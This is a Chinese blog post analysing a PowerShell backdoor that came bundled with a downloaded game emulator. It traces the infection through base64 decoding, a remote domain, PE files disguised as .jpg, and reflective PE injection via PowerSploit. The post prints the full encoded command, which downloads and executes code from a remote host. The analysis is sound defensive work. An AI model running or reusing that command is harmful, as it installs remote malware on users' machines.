应急响应|记一次对恶意软件的简单分析

应急响应|记一次对恶意软件的简单分析

a8937e6bf061e414d3e70d8dfed85323

前言

昨天下载了一个模拟器,正在打算回味马里奥的时候,火绒突然弹了一个报警,提示有程序想要运行powershell脚本,我一看,好家伙,应该是后门,简单的分析一波。

应急响应|记一次对恶意软件的简单分析

分析

步骤一

首先把执行的代码复制出来

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBpAHAALgBpAGMAdQBkAG8AbQBhAGkAbgAuAGkAYwB1ACcAKQApAA==

接着把后面的字符串进行base64解码,先将base64转为hex,再将hex里面无意义的00去除之后转字符串:

应急响应|记一次对恶意软件的简单分析
应急响应|记一次对恶意软件的简单分析
这里获取到一个域名:hxxp://ip.icudomain.icu,
先看一下这个域名的解析记录:

应急响应|记一次对恶意软件的简单分析
解析到的IP为cloudflare CDN的节点,故这里不进行端口扫描等对服务器的测试,继续分析他到底干了啥。
接着我们来看一下这个URL里面是啥

步骤二

应急响应|记一次对恶意软件的简单分析
对PEBytes进行进一步处理:

应急响应|记一次对恶意软件的简单分析
去除换行之后的内容:

应急响应|记一次对恶意软件的简单分析

步骤三

对里面的编码部分进行解码处理

应急响应|记一次对恶意软件的简单分析
可以发现又下载了两个文件,这个地方要注意一下,如果不使用{可}{学}{上}{网},会被拦截

应急响应|记一次对恶意软件的简单分析

应急响应|记一次对恶意软件的简单分析
powershell.jpg部分内容截图

应急响应|记一次对恶意软件的简单分析
对powershell.jpg进行解码,可以发现是一个pe文件

应急响应|记一次对恶意软件的简单分析

base64.jpg部分内容截图

应急响应|记一次对恶意软件的简单分析
对文件内容进行解码,也是一个pe文件

应急响应|记一次对恶意软件的简单分析
由于本人对PE文件不太熟悉,通过百度得知,Invoke-ReflectivePEInjection是一个可以加载pe文件的工具,github项目如下:https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
另外一个PE文件应该就是后门,分析到此结束。由于本人技术比较菜,感谢大家的阅读。

06a733e82a2268b6813e289f0cce57a3-1

本文来自投稿,不代表安强科技社区立场,如若转载,请注明出处:https://community.anqiangkj.com/archives/3488

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年1月22日 下午7:32
下一篇 2022年1月22日 下午7:40

相关推荐

发表回复

您的电子邮箱地址不会被公开。